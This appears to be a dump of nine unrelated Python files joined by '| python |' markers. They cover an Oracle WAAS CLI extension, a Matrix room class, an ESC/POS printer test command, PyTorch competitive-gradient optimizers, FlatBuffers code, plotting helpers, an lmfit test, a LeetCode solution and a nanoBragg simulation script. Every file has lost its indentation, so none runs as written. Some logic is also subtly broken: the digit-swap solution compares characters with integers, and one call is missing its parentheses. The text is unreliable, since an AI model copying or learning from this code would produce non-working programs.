# oci waas custom-protection-rule-setting update-waas-policy-custom-protection-rules --update-custom-protection-rules-details, --waas-policy-id
# to
# oci waas custom-protection-rule update-setting --custom-protection-rules-details, --waas-policy-id
waas_cli.waas_root_group.commands.pop(waas_cli.custom_protection_rule_setting_group.name)
@cli_util.copy_params_from_generated_command(waas_cli.update_waas_policy_custom_protection_rules, params_to_exclude=['update_custom_protection_rules_details'])
@waas_cli.custom_protection_rule_group.command(name=cli_util.override('update_waas_policy_custom_protection_rules.command_name', 'update-setting'), help=waas_cli.update_waas_policy_custom_protection_rules.help)
@cli_util.option('--custom-protection-rules-details', required=True, type=custom_types.CLI_COMPLEX_TYPE, help=u"""""" + custom_types.cli_complex_type.COMPLEX_TYPE_HELP)
@click.pass_context
@json_skeleton_utils.json_skeleton_generation_handler(input_params_to_complex_types={'custom-protection-rules-details': {'module': 'waas', 'class': 'list[CustomProtectionRuleSetting]'}})
@cli_util.wrap_exceptions
def update_waas_policy_custom_protection_rules_extended(ctx, **kwargs):
if 'custom_protection_rules_details' in kwargs:
kwargs['update_custom_protection_rules_details'] = kwargs['custom_protection_rules_details']
kwargs.pop('custom_protection_rules_details')
ctx.invoke(waas_cli.update_waas_policy_custom_protection_rules, **kwargs)
# oci waas waas-policy-custom-protection-rule list --waas-policy-id, --action, --all-pages, --mod-security-rule-id
# to
# oci waas waas-policy custom-protection-rule list --waas-policy-id, --action, --all-pages, --mod-security-rule-id
waas_cli.waas_root_group.commands.pop(waas_cli.waas_policy_custom_protection_rule_group.name)
waas_cli.waas_policy_group.add_command(waas_cli.waas_policy_custom_protection_rule_group)
cli_util.rename_command(waas_cli.waas_policy_group, waas_cli.waas_policy_custom_protection_rule_group, "custom-protection-rule")
| python |
""""""
from SSNRoom import SSNRoom
import json
class WallRoom(SSNRoom):
def __init__(self, room):
super().__init__(room)
# self._load()
self.wall_store = None
def _load(self):
self.wall_store = json.loads(self.room.topic)
print("hi")
# room_events = self.room.get_events()
# events_ct = len(room_events)
# for i in range(0, events_ct):
# event = room_events.pop()
# if event['type'] == "m.room.message":
# text = event["content"]["body"]
# if "time_of_update" in text:
# wse = json.loads(event["content"]["body"])
# self.wall_store = wse
def get_wall_store(self):
return self.wall_store
| python |
# -*- coding: utf-8 -*-
#
# escpostools/commands/cmd_test.py
#
# Copyright 2018 Base4 Sistemas Ltda ME
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import click
from escpostools.aliases import resolve_alias
from escpostools.cli import pass_context
LONG_RULER = '....:....|' * 8
SHORT_RULER = '....:....|' * 4
@click.command('test', short_help='Runs tests against implementations.')
@click.argument('aliases', type=click.STRING)
@click.option('--all', is_flag=True, help='Run all predefined test sets')
@click.option('--align', is_flag=True, help='Run predefined alignment test set')
@click.option('--modes', is_flag=True, help='Run predefined modes test set')
@click.option('--rulers', is_flag=True, help='Run predefined rulers test set')
@pass_context
def cli(ctx, aliases, all, align, modes, rulers):
"""Runs predefined tests against one or more implementations, sending sets
of commands to the printer(s) throught associated connection method(s).
For this command to work you must assign at least one alias with an
implementation and connection method. See help for "assign" command. For
example, if you want to run "modes" and "align" tests against an
implementation aliased as "tmt20" you type:
\b
$ escpos test tmt20 --align --modes
Or you can run all predefined tests against three aliased implementations:
\b
$ escpos test rm22,tmt20,dr700 --all
"""
impls = [resolve_alias(alias_id) for alias_id in aliases.split(',')]
if all:
align = True
modes = True
rulers = True
for impl in impls:
if align:
_run_align(impl)
if modes:
_run_modes(impl)
if rulers:
_run_rulers(impl)
def _run_align(impl):
impl.init()
impl.text('[Aligment Tests]')
impl.lf()
impl.justify_right()
impl.text('Right Aligned')
impl.justify_center()
impl.text('Centered Text')
impl.justify_left()
impl.text('Left Aligned')
impl.lf(2)
impl.text('This long text paragraph should be left aligned. The quick brown fox jumps over the lazy dog.')
impl.lf()
impl.justify_center()
impl.text('This long text paragraph should be centered. The quick brown fox jumps over the lazy dog.')
impl.lf()
impl.justify_right()
impl.text('This long text paragraph should be right aligned. The quick brown fox jumps over the lazy dog.')
impl.lf()
impl.justify_left()
impl.lf(2)
def _run_modes(impl):
impl.init()
impl.text('[Modes]')
impl.lf()
impl.text('Just normal text.')
impl.lf()
impl.text('Entering condensed...')
impl.set_condensed(True)
impl.text('The quick brown fox jumps over the lazy dog.')
impl.set_condensed(False)
impl.text('Condensed mode OFF')
impl.lf()
impl.text('Entering expanded...')
impl.set_expanded(True)
impl.text('The quick brown fox jumps over the lazy dog.')
impl.set_expanded(False)
impl.text('Expanded mode OFF')
impl.lf(2)
def _run_rulers(impl):
impl.init()
impl.text('[Rulers]')
impl.lf()
impl.text(LONG_RULER)
impl.lf(2)
impl.set_condensed(True)
impl.text(LONG_RULER)
impl.set_condensed(False)
impl.lf(2)
impl.set_expanded(True)
impl.text(SHORT_RULER)
impl.set_expanded(False)
impl.lf(2)
| python |
# This is a preliminary version of the code
from typing import Any
import time
import torch
import numpy
from torch import Tensor
from torch import autograd
from torch.autograd import Variable
from torch.autograd import grad
def hessian_vec(grad_vec, var, retain_graph=False):
v = torch.ones_like(var)
vec, = autograd.grad(grad_vec, var, grad_outputs=v, allow_unused=True, retain_graph=retain_graph)
return vec
def hessian(grad_vec, var, retain_graph=False):
v = torch.eye(var.shape[0])
matrix = torch.cat([autograd.grad(grad_vec, var, grad_outputs=v_row, allow_unused=True, retain_graph=retain_graph)[0]
for v_row in v])
matrix = matrix.view(-1,var.shape[0])
return matrix
class Richardson(object):
def __init__(self, matrix, rhs, tol, maxiter, relaxation, verbose=False):
"""
:param matrix: coefficient matrix
:param rhs: right hand side
:param tol: tolerance for stopping criterion based on the relative residual
:param maxiter: maximum number of iterations
:param relaxation: relaxation parameter for Richardson
:param initial_guess: initial guess
:return: matrix ** -1 * rhs
"""
self.rhs = rhs
self.matrix = matrix
self.tol = tol
self.maxiter = maxiter
self.relaxation = relaxation
self.rhs_norm = torch.norm(rhs, 2)
self.iteration_count = 0
self.verbose = verbose
def print_verbose(self, *args, **kwargs):
if self.verbose :
print(*args, **kwargs)
def solve(self, initial_guess):
## TODO: consider passing initial guess to solve()
residual = self.rhs - self.matrix @ initial_guess
residual_norm = residual.norm()
relative_residual_norm = residual_norm / self.rhs_norm
solution = initial_guess
while relative_residual_norm > self.tol and self.iteration_count < self.maxiter:
## TODO: consider making all of these non-attributes and just return them
solution = solution + self.relaxation * residual
residual = self.rhs - torch.matmul(self.matrix, solution)
residual_norm = residual.norm()
relative_residual_norm = residual_norm / self.rhs_norm
self.iteration_count += 1
self.print_verbose("Richardson converged in ", str(self.iteration_count), " iteration with relative residual norm: ",
str(relative_residual_norm), end='...')
# Do not return because it's already an attribute
return solution
"""
class Optimizer:
def __init__(self, iteration, tolerance, device="cpu"):
self.iter = iteration
self.tol = tolerance
self.dev = torch.device(device)
def solve(self):
raise NotImplementedError
class SpecialOptimizer(Optimizer):
def __init__(self, *args, **kwargs):
iteration, tolerance = args[:]
device = kwargs.get("device", "cpu")
super(SpecialOptimizer, self).__init__(iteration, tolerance, device=device)
## do something with args and kwargs ...
def solve(self):
pass
"""
class ConjugateGradient(object):
def __init__(self, nsteps=10, residual_tol=1e-18, lr=1.0, verbose=True):
self.nsteps = nsteps
self.residual_tol = residual_tol
self.lr = lr
self.verbose = verbose
self.iter_count = 0
def print_verbose(self, *args, **kwargs):
if self.verbose :
print(*args, **kwargs)
def solve(self, f, g, x, y):
f_history = []
g_history = []
x_history = []
y_history = []
f_history.append(f(x, y))
g_history.append(g(x, y))
x_history.append(x)
y_history.append(y)
while self.iter_count < self.nsteps:
self.iter_count += 1
f_eval = f(x, y)
g_eval = g(x, y)
grad_f_x = autograd.grad(f_eval, x, create_graph=True, allow_unused=True)
grad_g_y = autograd.grad(g_eval, y, create_graph=True, allow_unused=True)
new_x = x - self.lr * grad_f_x[0]
new_y = y - self.lr * grad_g_y[0]
x = new_x.clone().detach().requires_grad_(True)
y = new_y.clone().detach().requires_grad_(True)
self.print_verbose("######################################################")
self.print_verbose("Iteration: ", self.iter_count)
self.print_verbose("x: ", x)
self.print_verbose("y: ", y)
self.print_verbose("f(x,y): ", f(x, y))
self.print_verbose("g(x,y): ", g(x, y))
self.print_verbose("######################################################")
f_history.append(f(x, y))
g_history.append(g(x, y))
x_history.append(x)
y_history.append(y)
return f_history, g_history, x_history, y_history
class CompetitiveGradient(object):
def __init__(self, nsteps=10, residual_tol=1e-10, lr=1e-3, verbose=True, full_hessian=False):
self.nsteps = nsteps
self.residual_tol = residual_tol
self.lr = lr
self.verbose = verbose
self.full_hessian = full_hessian
self.iter_count = 0
def print_verbose(self, *args, **kwargs):
if self.verbose :
print(*args, **kwargs)
def solve(self, f, g, x, y):
f_history = []
g_history = []
x_history = []
y_history = []
x_history.append(x)
y_history.append(y)
while self.iter_count < self.nsteps:
self.iter_count += 1
f_val = f(x, y)
g_val = g(x, y)
grad_f_x, = autograd.grad(f_val, x, create_graph=True, allow_unused=True)
grad_g_y, = autograd.grad(g_val, y, create_graph=True, allow_unused=True)
if not self.full_hessian:
hess_f_xy = hessian_vec(grad_f_x, y, retain_graph=False)
hess_g_yx = hessian_vec(grad_g_y, x, retain_graph=False)
x_rhs = grad_f_x - self.lr * torch.matmul(hess_f_xy, grad_g_y)
y_rhs = grad_g_y - self.lr * torch.matmul(hess_g_yx, grad_f_x)
# The "*" multiplication operates elementwise
# We have to use the "*" and not the matmul method because we do NOT extract the entire Hessian matrix, we just
# extract the diagonal entries
#__x_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.diag_embed(torch.matmul(__hess_f_xy, __hess_g_yx))
x_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.diag_embed(hess_f_xy * hess_g_yx)
#__y_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.diag_embed(torch.matmul(__hess_g_yx, __hess_f_xy))
y_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.diag_embed(hess_g_yx * hess_f_xy)
else:
hess_f_xy = hessian(grad_f_x, y, retain_graph=False)
hess_g_yx = hessian(grad_g_y, x, retain_graph=False)
x_rhs = grad_f_x - self.lr * torch.matmul(hess_f_xy, grad_g_y)
y_rhs = grad_g_y - self.lr * torch.matmul(hess_g_yx, grad_f_x)
x_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.matmul(hess_f_xy, hess_g_yx)
y_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.matmul(hess_g_yx, hess_f_xy)
solver1 = Richardson(x_A, x_rhs, 1e-10, 1000, 1, verbose=False)
initial_guess_x = torch.randn(x_rhs.shape)
delta_x = solver1.solve(initial_guess_x)
solver2 = Richardson(y_A, y_rhs, 1e-10, 1000, 1, verbose=False)
initial_guess_y = torch.randn(y_rhs.shape)
delta_y = solver2.solve(initial_guess_y)
new_x = x - self.lr * delta_x
new_y = y - self.lr * delta_y
x = new_x.clone().detach().requires_grad_(True)
y = new_y.clone().detach().requires_grad_(True)
self.print_verbose("######################################################")
self.print_verbose("Iteration: ", self.iter_count)
self.print_verbose("x: ", x)
self.print_verbose("y: ", y)
self.print_verbose("f(x,y): ", f(x, y))
self.print_verbose("g(x,y): ", g(x, y))
self.print_verbose("hess_f_xy:", hess_f_xy)
self.print_verbose("hess_g_yx:", hess_g_yx)
self.print_verbose("######################################################")
f_history.append(f(x, y))
g_history.append(g(x, y))
x_history.append(x)
y_history.append(y)
return f_history, g_history, x_history, y_history
class CompetitiveGradientJacobi(object):
def __init__(self, nsteps=10, residual_tol=1e-10, lr=1e-3, verbose=True, full_hessian=False):
self.nsteps = nsteps
self.residual_tol = residual_tol
self.lr = lr
self.verbose = verbose
self.full_hessian = full_hessian
self.iter_count = 0
def print_verbose(self, *args, **kwargs):
if self.verbose :
print(*args, **kwargs)
def solve(self, f, g, x, y, delay=1):
x_buffer = []
y_buffer = []
f_history = []
g_history = []
x_history = []
y_history = []
prev_y = y.clone().detach().requires_grad_(True)
prev_x = x.clone().detach().requires_grad_(True)
x_history.append(x)
y_history.append(y)
while self.iter_count < self.nsteps:
self.iter_count += 1
f_val_x = f(x, prev_y)
f_val_y = f(prev_x, y)
g_val_x = g(x, prev_y)
g_val_y = g(prev_x, y)
grad_f_x_x, = autograd.grad(f_val_x, x, create_graph=True,
allow_unused=True) # terrible variable name, implies diagonal hessian!!
grad_f_x_y, = autograd.grad(f_val_y, prev_x, create_graph=True,
allow_unused=True) # terrible variable name, implies diagonal hessian!!
grad_g_y_x, = autograd.grad(g_val_x, prev_y, create_graph=True, allow_unused=True)
grad_g_y_y, = autograd.grad(g_val_y, y, create_graph=True, allow_unused=True)
if not self.full_hessian:
hess_f_xy_x = hessian_vec(grad_f_x_x, prev_y, retain_graph=False)
hess_f_xy_y = hessian_vec(grad_f_x_y, y, retain_graph=False)
hess_g_yx_x = hessian_vec(grad_g_y_x, x, retain_graph=False)
hess_g_yx_y = hessian_vec(grad_g_y_y, prev_x, retain_graph=False)
delta_x = -self.lr * (grad_f_x_x + 2 * hess_f_xy_x * grad_g_y_x)
delta_y = -self.lr * (grad_g_y_y + 2 * hess_g_yx_y * grad_f_x_y)
else:
hess_f_xy_x = hessian(grad_f_x_x, prev_y, retain_graph=False)
hess_f_xy_y = hessian(grad_f_x_y, y, retain_graph=False)
hess_g_yx_x = hessian(grad_g_y_x, x, retain_graph=False)
hess_g_yx_y = hessian(grad_g_y_y, prev_x, retain_graph=False)
delta_x = -self.lr * (grad_f_x_x + 2 * torch.matmul(hess_f_xy_x, grad_g_y_x))
delta_y = -self.lr * (grad_g_y_y + 2 * torch.matmul(hess_g_yx_y, grad_f_x_y))
new_x = x - self.lr * delta_x
new_y = y - self.lr * delta_y
x = new_x.clone().detach().requires_grad_(True)
y = new_y.clone().detach().requires_grad_(True)
x_buffer.append(x)
y_buffer.append(y)
self.print_verbose("######################################################")
self.print_verbose("Iteration: ", self.iter_count)
self.print_verbose("x: ", x)
self.print_verbose("y: ", y)
self.print_verbose("f(x,y): ", f(x, y))
self.print_verbose("g(x,y): ", g(x, y))
self.print_verbose("hess_f_xy_x:", hess_f_xy_x)
self.print_verbose("hess_f_xy_y:", hess_f_xy_y)
self.print_verbose("hess_g_yx_x:", hess_g_yx_x)
self.print_verbose("hess_g_yx_y:", hess_g_yx_y)
self.print_verbose("######################################################")
f_history.append(f(x, y))
g_history.append(g(x, y))
x_history.append(x)
y_history.append(y)
if self.iter_count > delay:
prev_y = y_buffer[self.iter_count - delay].clone().detach().requires_grad_(True)
prev_x = x_buffer[self.iter_count - delay].clone().detach().requires_grad_(True)
return f_history, g_history, x_history, y_history
| python |
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: DeepSeaScene
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class SubpassDependency(object):
__slots__ = ['_tab']
@classmethod
def SizeOf(cls):
return 28
# SubpassDependency
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# SubpassDependency
def SrcSubpass(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(0))
# SubpassDependency
def SrcStages(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(4))
# SubpassDependency
def SrcAccess(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(8))
# SubpassDependency
def DstSubpass(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(12))
# SubpassDependency
def DstStages(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(16))
# SubpassDependency
def DstAccess(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(20))
# SubpassDependency
def RegionDependency(self): return self._tab.Get(flatbuffers.number_types.BoolFlags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(24))
def CreateSubpassDependency(builder, srcSubpass, srcStages, srcAccess, dstSubpass, dstStages, dstAccess, regionDependency):
builder.Prep(4, 28)
builder.Pad(3)
builder.PrependBool(regionDependency)
builder.PrependUint32(dstAccess)
builder.PrependUint32(dstStages)
builder.PrependUint32(dstSubpass)
builder.PrependUint32(srcAccess)
builder.PrependUint32(srcStages)
builder.PrependUint32(srcSubpass)
return builder.Offset()
| python |
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.feature_selection import mutual_info_classif
def draw_cat_plot(df: pd.DataFrame, id_var: str, cat_feats: list, *, output_filename: str =None):
"""
Draw plot showing value counts of categorical features.
:parameter dframe: pandas dataframe containing the feature `id_var` and all of the features in `cat_feats`.
Note: this implementation does not check that all of the relevant features are in `dframe`.
:parameter id_var: Feature name (string) with respect to which panels of the categorical plot
are made. For instance, for a binary feature, the plot will
have two panels showing the respective counts of categorical features.
:parameter cat_feats: list of strings of categorical features to plot.
:parameter output_filename: if the plot is to be saved, this is its name.
(default=None, i.e., plot is not saved)
:return: Seaborn figure object.
"""
# Create DataFrame for cat plot using `pd.melt` using just the values from categorical features
df_cat = pd.melt(df, id_vars=id_var, value_vars=cat_feats)
# Draw the catplot
fig = sns.catplot(x="variable", hue="value", col=id_var, data=df_cat,
kind="count")
fig.set_xlabels('')
fig.set_xticklabels(rotation=90)
fig.savefig(output_filename) if output_filename is not None else True
return fig
def draw_corr_matrix(df: pd.DataFrame):
"""
- Draw correlation matrix as heatmap.
- Draw correlation for target feature and mutual information in a bar plot.
Note: Assuming the target feature is in the last column of df.
:parameter df: pandas dataframe with all of the relevant features as columns.
:return: fig: matplotlib figure object;
corr: correlation matrix for all features;
scores: pandas dataframe with the correlation and mutual information scores
for the target feature.
"""
target = df.columns[-1]
corr = df.corr() # Calculate the correlation matrix
target_corr = corr.loc[target, corr.columns.delete(-1)] # Correlation for the target
mi = mutual_info_classif(df.iloc[:, :-1], df[target]) # Calculate MI score
scores = target_corr.to_frame()
scores.rename(columns={target: "Corr"}, inplace=True)
scores["MI"] = mi
scores_melted = pd.melt(scores, ignore_index=False)
mask = np.zeros_like(corr)
mask[np.triu_indices_from(mask)] = True # Generate a mask for the upper triangle
fig, ax = plt.subplots(2, 1, figsize=(8, 15), dpi=100)
sns.heatmap(corr, mask=mask, square=True, ax=ax[0], cmap='Spectral_r',
annot=True, fmt='.2f', annot_kws={'fontsize': 8})
ax[0].set_title("Feature Correlation", fontdict={"fontsize": 14})
# Plot the "Cardio" correlation and mutual information scores on the sme graph.
sns.barplot(x="value", y=scores_melted.index, hue="variable",
data=scores_melted, ax=ax[1], palette='crest')
# sns.barplot(x=[np.array(cardio_corr), mi], y=cardio_corr.index, ax=ax[1],
# color=[0.30, 0.41, 0.29]) # to plot just the "Cardio" correlation scores
ax[1].set_title(f"Target ({target}) Correlation and Mutual Information",
fontdict={"fontsize": 14})
ax[1].set_xlabel(None)
ax[1].legend(title=None)
ax[1].grid(axis='x')
fig.savefig('Corr_matrix_Target.png')
return fig, corr, scores
| python |
import numpy as np
from lmfit import Parameters, minimize, report_fit
from lmfit.models import LinearModel, GaussianModel
from lmfit.lineshapes import gaussian
def per_iteration(pars, iter, resid, *args, **kws):
"""iteration callback, will abort at iteration 23
"""
# print( iter, ', '.join(["%s=%.4f" % (p.name, p.value) for p in pars.values()]))
return iter == 23
def test_itercb():
x = np.linspace(0, 20, 401)
y = gaussian(x, amplitude=24.56, center=7.6543, sigma=1.23)
y = y - .20*x + 3.333 + np.random.normal(scale=0.23, size=len(x))
mod = GaussianModel(prefix='peak_') + LinearModel(prefix='bkg_')
pars = mod.make_params(peak_amplitude=21.0,
peak_center=7.0,
peak_sigma=2.0,
bkg_intercept=2,
bkg_slope=0.0)
out = mod.fit(y, pars, x=x, iter_cb=per_iteration)
assert(out.nfev == 23)
assert(out.aborted)
assert(not out.errorbars)
assert(not out.success)
| python |
from typing import List
class Solution:
def maximum69Number (self, num: int) -> int:
ls = list('%d'%num)
ans = 0
try:
index = ls.index(6)
ls[index] = 9
for it in ls:
ans = ans * 10 + it
return ans
except ValueError as err:
ans = num
finally:
return ans
| python |
from __future__ import absolute_import, division, print_function
from scitbx.array_family import flex # import dependency
from simtbx.nanoBragg import shapetype
from simtbx.nanoBragg import convention
from simtbx.nanoBragg import nanoBragg
import libtbx.load_env # possibly implicit
from cctbx import crystal
import os
# allow command-line options
GOFAST = False
import sys
if len(sys.argv)>1:
if sys.argv[1] == "fast":
print("SPEEDING UP! ")
GOFAST = True
# get the structure factor of spots
mtzfile = "model_nophase.mtz"
stolfile = "./bg.stol"
imgfile = "./F4_0_00008.mccd.gz"
# get stuff from the web if we have to
if not os.path.isfile(mtzfile):
from six.moves import urllib
url = "http://bl831.als.lbl.gov/~jamesh/simtbx/"+mtzfile
urllib.request.urlretrieve(url, mtzfile)
if not os.path.isfile(stolfile):
from six.moves import urllib
url = "http://bl831.als.lbl.gov/~jamesh/simtbx/bg.stol"
urllib.request.urlretrieve(url, stolfile)
if not os.path.isfile(imgfile):
from six.moves import urllib
url = "http://bl831.als.lbl.gov/~jamesh/simtbx/"+imgfile
urllib.request.urlretrieve(url, imgfile)
# make sure we got everything we need
assert os.path.isfile(mtzfile)
assert os.path.isfile(stolfile)
assert os.path.isfile(imgfile)
# read in structure factor amplitudes
from iotbx.reflection_file_reader import any_reflection_file
mtz_file = any_reflection_file(mtzfile)
Fhkl = mtz_file.as_miller_arrays()[0]
# get the structure factors of the background
Fbg_vs_stol = []
with open(stolfile, "rb") as fp:
for i in fp.readlines():
tmp = i.split(" ")
try:
Fbg_vs_stol.append((float(tmp[0]), float(tmp[1])))
except Exception:pass
# now Fbg_vs_stol is a list of stol,Fbg tuples
# open the existing diffraction image: we need it for the background profile
import dxtbx
img = dxtbx.load(imgfile)
panel = img.get_detector()[0]
pixel_size_mm = panel.get_pixel_size[0]
distance_mm = panel.get_distance()
#beam_center_mm =
# create the simulation
SIM = nanoBragg(img.get_detector(),img.get_beam(),verbose=6)
#SIM = nanoBragg(detpixels_slowfast=(4096,4096),pixel_size_mm=0.079346,verbose=9)
SIM.Fhkl = Fhkl
SIM.Fbg_vs_stol = Fbg_vs_stol
print(SIM.Fbg_vs_stol[1])
SIM.Fbg_vs_stol[1]=(0,0)
print(SIM.Fbg_vs_stol[1])
SIM.Fbg_vs_stol[1]=(0,0)
print(SIM.Fbg_vs_stol[1])
#from IPython import embed
#embed()
blarg = SIM.Fbg_vs_stol
blarg[1] = (0,0)
SIM.Fbg_vs_stol = blarg
print(SIM.Fbg_vs_stol[1])
# sigh, just keep going...
#exit()
print("beam_center_mm=",SIM.beam_center_mm)
print("XDS_ORGXY=",SIM.XDS_ORGXY)
print("detector_pivot=",SIM.detector_pivot)
print("beamcenter_convention=",SIM.beamcenter_convention)
print("fdet_vector=",SIM.fdet_vector)
print("sdet_vector=",SIM.sdet_vector)
print("odet_vector=",SIM.odet_vector)
print("beam_vector=",SIM.beam_vector)
print("polar_vector=",SIM.polar_vector)
print("spindle_axis=",SIM.spindle_axis)
print("twotheta_axis=",SIM.twotheta_axis)
print("distance_meters=",SIM.distance_meters)
print("distance_mm=",SIM.distance_mm)
print("close_distance_mm=",SIM.close_distance_mm)
print("detector_twotheta_deg=",SIM.detector_twotheta_deg)
print("detsize_fastslow_mm=",SIM.detsize_fastslow_mm)
print("detpixels_fastslow=",SIM.detpixels_fastslow)
print("detector_rot_deg=",SIM.detector_rot_deg)
print("curved_detector=",SIM.curved_detector)
print("pixel_size_mm=",SIM.pixel_size_mm)
print("point_pixel=",SIM.point_pixel)
print("polarization=",SIM.polarization)
print("nopolar=",SIM.nopolar)
print("oversample=",SIM.oversample)
print("region_of_interest=",SIM.region_of_interest)
print("wavelength_A=",SIM.wavelength_A)
print("energy_eV=",SIM.energy_eV)
print("fluence=",SIM.fluence)
print("flux=",SIM.flux)
print("exposure_s=",SIM.exposure_s)
print("beamsize_mm=",SIM.beamsize_mm)
print("dispersion_pct=",SIM.dispersion_pct)
print("dispsteps=",SIM.dispsteps)
print("divergence_hv_mrad=",SIM.divergence_hv_mrad)
print("divsteps_hv=",SIM.divsteps_hv)
print("divstep_hv_mrad=",SIM.divstep_hv_mrad)
print("round_div=",SIM.round_div)
print("phi_deg=",SIM.phi_deg)
print("osc_deg=",SIM.osc_deg)
print("phisteps=",SIM.phisteps)
print("phistep_deg=",SIM.phistep_deg)
print("detector_thick_mm=",SIM.detector_thick_mm)
print("detector_thicksteps=",SIM.detector_thicksteps)
print("detector_thickstep_mm=",SIM.detector_thickstep_mm)
print("mosaic_spread_deg=",SIM.mosaic_spread_deg)
print("mosaic_domains=",SIM.mosaic_domains)
print("indices=",SIM.indices)
print("amplitudes=",SIM.amplitudes)
print("Fhkl_tuple=",SIM.Fhkl_tuple)
print("default_F=",SIM.default_F)
print("interpolate=",SIM.interpolate)
print("integral_form=",SIM.integral_form)
# modify things that are missing, or not quite right in the header
SIM.close_distance_mm=299.83
SIM.wavelength_A=1.304735
SIM.polarization=0.99
SIM.beamsize_mm=0.03
#SIM.fluence=4.28889e+18
# fluence scaled to make crystal look bigger
SIM.fluence=1.03e+27
SIM.beamcenter_convention=convention.Custom
SIM.beam_center_mm=( 160.53, 182.31 )
SIM.dispersion_pct = 0.5
SIM.dispsteps=6
print("dispsteps=",SIM.dispsteps)
SIM.divergence_hv_mrad = ( 0.02, 0.02 )
SIM.divsteps_hv = ( 2 , 2 )
print(SIM.divsteps_hv)
SIM.round_div=True
print(SIM.divsteps_hv)
#SIM.detector_thick_mm = 0.037
SIM.detector_thick_mm = 0.
SIM.detector_thicksteps = 1
# override mtz unit cell
SIM.unit_cell_tuple = ( 68.78, 169.26, 287.42, 90, 90, 90 )
#SIM.Ncells_abc = ( 1, 1, 1 )
SIM.Ncells_abc = ( 14, 6, 4 )
#SIM.Ncells_abc = ( 35, 15, 10 )
print("Ncells_abc=",SIM.Ncells_abc)
SIM.xtal_shape=shapetype.Tophat
print("xtal_size_mm=",SIM.xtal_size_mm)
SIM.interpolate=0
SIM.progress_meter=True
SIM.mosaic_spread_deg = 0.2
SIM.mosaic_domains = 30
SIM.oversample = 1
SIM.detector_psf_type=shapetype.Fiber
SIM.adc_offset_adu = 10
SIM.readout_noise_adu = 1.5
SIM.show_sources()
# speedups, comment out for realism
if GOFAST:
SIM.divergence_hv_mrad = ( 0,0 )
SIM.dispersion_pct = 0
SIM.mosaic_spread_deg = 0
# set this to 0 or -1 to trigger automatic radius. could be very slow with bright images
SIM.detector_psf_kernel_radius_pixels=5;
# use one pixel for diagnostics?
SIM.printout_pixel_fastslow=(1782,1832)
# debug only a little patch
#SIM.region_of_interest=((1450,1850),(1550,1950))
SIM.amorphous_sample_thick_mm = 0.1
SIM.amorphous_density_gcm3 = 7e-7
SIM.amorphous_sample_molecular_weight_Da = 18 # default
# load in the real image so we can extract the background
SIM.raw_pixels = img.get_raw_data().as_double()
#print SIM.Fbg_vs_stol[100]
SIM.extract_background()
#print SIM.Fbg_vs_stol[100]
# maybe edit background trace here?
# or, forget it, reset to old one:
SIM.Fbg_vs_stol = Fbg_vs_stol
# now clear the pixels
SIM.raw_pixels*=0;
print("dispsteps=",SIM.dispsteps)
print("divsteps=",SIM.divsteps_hv)
print("oversample=",SIM.oversample)
SIM.add_background(oversample=1,source=0)
print("mid_sample=",SIM.raw_pixels[1782,1832])
print("dispsteps=",SIM.dispsteps)
print("divsteps=",SIM.divsteps_hv)
print("oversample=",SIM.oversample)
SIM.to_smv_format(fileout="intimage_001.img",intfile_scale=1)
# three clusters of mosaic domains
if GOFAST == False:
SIM.fluence /= 3
SIM.missets_deg = ( 96.9473, -52.0932, -32.518 )
#SIM.missets_deg = ( 96.544, -51.9673, -32.4243 )
SIM.add_nanoBragg_spots()
SIM.to_smv_format(fileout="intimage_002.img",intfile_scale=1)
SIM.missets_deg = ( 97.5182, -52.3404, -32.7289 )
SIM.add_nanoBragg_spots()
SIM.to_smv_format(fileout="intimage_003.img",intfile_scale=1)
SIM.missets_deg = ( 97.1251, -52.2242, -32.751 )
SIM.add_nanoBragg_spots()
SIM.to_smv_format(fileout="intimage_004.img",intfile_scale=1)
SIM.detector_psf_fwhm_mm=0.08;
SIM.detector_psf_type=shapetype.Fiber
# get same noise each time this test is run
SIM.seed = 1
print("seed=",SIM.seed)
print("calib_seed=",SIM.calib_seed)
print("quantum_gain=",SIM.quantum_gain)
print("adc_offset_adu=",SIM.adc_offset_adu)
print("detector_calibration_noise_pct=",SIM.detector_calibration_noise_pct)
print("flicker_noise_pct=",SIM.flicker_noise_pct)
print("readout_noise_adu=",SIM.readout_noise_adu)
print("detector_psf_type=",SIM.detector_psf_type)
print("detector_psf_fwhm_mm=",SIM.detector_psf_fwhm_mm)
print("detector_psf_kernel_radius_pixels=",SIM.detector_psf_kernel_radius_pixels)
SIM.show_params()
SIM.add_noise()
print("raw_pixels=",SIM.raw_pixels)
SIM.to_smv_format(fileout="noiseimage_001.img",intfile_scale=1)
print("mosaic_domains=",SIM.mosaic_domains)
print("mosaic_spread_deg=",SIM.mosaic_spread_deg)
print("dispersion_pct=",SIM.dispersion_pct)
print("dispsteps=",SIM.dispsteps)
print("divergence_hv_mrad=",SIM.divergence_hv_mrad)
print("divergence_hv=",SIM.divsteps_hv)
print("GOT HERE 1")
SIM.verbose=999
